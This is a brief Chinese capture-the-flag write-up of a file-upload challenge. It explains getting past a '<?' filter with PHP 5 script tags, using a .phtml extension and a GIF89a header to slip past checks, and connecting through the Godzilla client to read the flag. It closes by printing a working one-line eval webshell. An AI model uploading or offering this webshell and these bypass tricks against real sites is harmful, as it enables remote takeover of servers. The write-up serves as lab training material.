先写一个万能的一句话木马
-
使用一句话木马
-
发现这个是有内容过滤的 过滤了 <?
-
-
-
发现这个过滤的很死
-
那就只能使用 不带 ? 的短标签了 使用script 标签 这个的使用只限于对方的php是5版本的
-
正好是低版本的
-
所以直接上传 改一下后缀为 phtml
-
成功上传 但是我们没有找到具体的上传地址 :1、目录扫描 2、猜一下是不是 upload 目录
-
发现猜对了
-
哥斯拉链接
-
找一下flag
-
flag{537f95ae-87a4-43f4-973a-1492ae8a92af}
-
知识点 : 1、php 后缀的绕过 : phtml
-
2、 php短标签的绕过(只有php版本为5开头的才行) :
-
GIF89a // 这个是万能标签 防止 MIME 检查文件头
-
<script language="php">
-
eval($_POST['pass']);
-
</script>